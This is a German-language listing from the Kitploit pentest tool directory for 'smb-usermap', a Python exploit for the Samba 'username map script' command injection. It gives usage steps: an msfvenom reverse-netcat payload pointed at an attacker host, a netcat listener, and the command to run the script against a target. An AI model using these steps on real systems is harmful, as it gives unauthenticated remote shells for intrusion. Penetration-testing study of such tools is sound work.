Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
smb-usermap — Python-Exploit für Samba 3.0.20-3.0.25rc3 'username map script' Befehlsinjektion, der nicht authentifizierte Remote-Codeausführung und eine Reverse Shell ermöglicht. | Kitploit
Tools/GitHubGitHub/h3x0v3rl0rd/smb-usermap
ExploitationPenetrationstestsRemote-Access-Tool
GitHubh3x0v3rl0rd/smb-usermap

smb-usermap

Python-Exploit für Samba 3.0.20-3.0.25rc3 'username map script' Befehlsinjektion, der nicht authentifizierte Remote-Codeausführung und eine Reverse Shell ermöglicht.

Repository anzeigen
vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Samba "username map script" Befehlsausführung

Dieses Modul nutzt eine Schwachstelle zur Befehlsausführung in Samba-Versionen 3.0.20 bis 3.0.25rc3 aus, wenn die nicht standardmäßige Konfigurationsoption "username map script" verwendet wird. Durch die Angabe eines Benutzernamens, der Shell-Metazeichen enthält, können Angreifer beliebige Befehle ausführen. Für die Ausnutzung dieser Schwachstelle ist keine Authentifizierung erforderlich, da diese Option verwendet wird, um Benutzernamen vor der Authentifizierung zuzuordnen!

  1. Shellcode erstellen
root@kitploit:~
msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.56 LPORT=5555 -f python
  1. Netcat-Listener
root@kitploit:~
nc -nlvp 5555
  1. Skript ausführen
root@kitploit:~
python3 smbusermap.py <Target IP>

image

Tool herunterladen